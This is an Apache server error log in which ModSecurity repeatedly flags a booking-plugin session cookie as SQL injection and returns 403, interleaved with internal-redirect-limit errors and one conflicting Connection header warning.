[Tue May 12 03:56:34.652511 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/files"] [unique_id "agKI0rOxS7i6i_mT2NLeyQAAAEM"]
[Tue May 12 03:56:34.652719 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/files"] [unique_id "agKI0rOxS7i6i_mT2NLeyQAAAEM"]
[Tue May 12 03:56:34.652926 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI0rOxS7i6i_mT2NLeyQAAAEM"]
[Tue May 12 03:56:35.605966 2026] [core:error] [pid 1691274:tid 1691490] [client 74.249.238.26:60365] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:35.605998 2026] [core:error] [pid 1691274:tid 1691490] [client 74.249.238.26:60365] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:35.755018 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI07vMumyrWMfSu7q95AAAANU"]
[Tue May 12 03:56:35.755236 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI07vMumyrWMfSu7q95AAAANU"]
[Tue May 12 03:56:36.345791 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI07vMumyrWMfSu7q95AAAANU"]
[Tue May 12 03:56:37.063911 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/images"] [unique_id "agKI1bOxS7i6i_mT2NLezAAAAEM"]
[Tue May 12 03:56:37.064114 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/images"] [unique_id "agKI1bOxS7i6i_mT2NLezAAAAEM"]
[Tue May 12 03:56:37.064316 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI1bOxS7i6i_mT2NLezAAAAEM"]
[Tue May 12 03:56:37.209448 2026] [core:error] [pid 1730175:tid 1730188] [client 74.249.238.26:60400] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:37.209484 2026] [core:error] [pid 1730175:tid 1730188] [client 74.249.238.26:60400] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:37.536093 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI1bvMumyrWMfSu7q95gAAANU"]
[Tue May 12 03:56:37.536299 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI1bvMumyrWMfSu7q95gAAANU"]
[Tue May 12 03:56:38.113175 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI1bvMumyrWMfSu7q95gAAANU"]
[Tue May 12 03:56:38.560663 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/img"] [unique_id "agKI1rOxS7i6i_mT2NLezgAAAEM"]
[Tue May 12 03:56:38.560881 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/img"] [unique_id "agKI1rOxS7i6i_mT2NLezgAAAEM"]
[Tue May 12 03:56:38.561068 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI1rOxS7i6i_mT2NLezgAAAEM"]
[Tue May 12 03:56:38.911188 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI1rvMumyrWMfSu7q96AAAANU"]
[Tue May 12 03:56:38.911420 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI1rvMumyrWMfSu7q96AAAANU"]
[Tue May 12 03:56:39.492886 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI1rvMumyrWMfSu7q96AAAANU"]
[Tue May 12 03:56:41.744233 2026] [core:error] [pid 1730175:tid 1730180] [client 74.249.238.26:50299] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:41.744262 2026] [core:error] [pid 1730175:tid 1730180] [client 74.249.238.26:50299] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:42.331965 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/assets"] [unique_id "agKI2rOxS7i6i_mT2NLe1QAAAEM"]
[Tue May 12 03:56:42.332173 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/assets"] [unique_id "agKI2rOxS7i6i_mT2NLe1QAAAEM"]
[Tue May 12 03:56:42.332396 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI2rOxS7i6i_mT2NLe1QAAAEM"]
[Tue May 12 03:56:42.550527 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI2rvMumyrWMfSu7q98AAAANU"]
[Tue May 12 03:56:42.550725 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI2rvMumyrWMfSu7q98AAAANU"]
[Tue May 12 03:56:43.156438 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI2rvMumyrWMfSu7q98AAAANU"]
[Tue May 12 03:56:43.546065 2026] [core:error] [pid 1691274:tid 1691287] [client 74.249.238.26:60384] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:43.546095 2026] [core:error] [pid 1691274:tid 1691287] [client 74.249.238.26:60384] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:43.598591 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/media"] [unique_id "agKI27OxS7i6i_mT2NLe3QAAAEM"]
[Tue May 12 03:56:43.598788 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/media"] [unique_id "agKI27OxS7i6i_mT2NLe3QAAAEM"]
[Tue May 12 03:56:43.598987 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI27OxS7i6i_mT2NLe3QAAAEM"]
[Tue May 12 03:56:44.075721 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3LvMumyrWMfSu7q99wAAANU"]
[Tue May 12 03:56:44.075898 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3LvMumyrWMfSu7q99wAAANU"]
[Tue May 12 03:56:44.675772 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI3LvMumyrWMfSu7q99wAAANU"]
[Tue May 12 03:56:44.916522 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/private"] [unique_id "agKI3LOxS7i6i_mT2NLe4AAAAEM"]
[Tue May 12 03:56:44.916716 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/private"] [unique_id "agKI3LOxS7i6i_mT2NLe4AAAAEM"]
[Tue May 12 03:56:44.916914 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3LOxS7i6i_mT2NLe4AAAAEM"]
[Tue May 12 03:56:45.146915 2026] [security2:error] [pid 1707624:tid 1707706] [client 43.156.50.197:54686] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKI3bOxS7i6i_mT2NLe4QAAAFg"]
[Tue May 12 03:56:45.879418 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI3bvMumyrWMfSu7q9-gAAANU"]
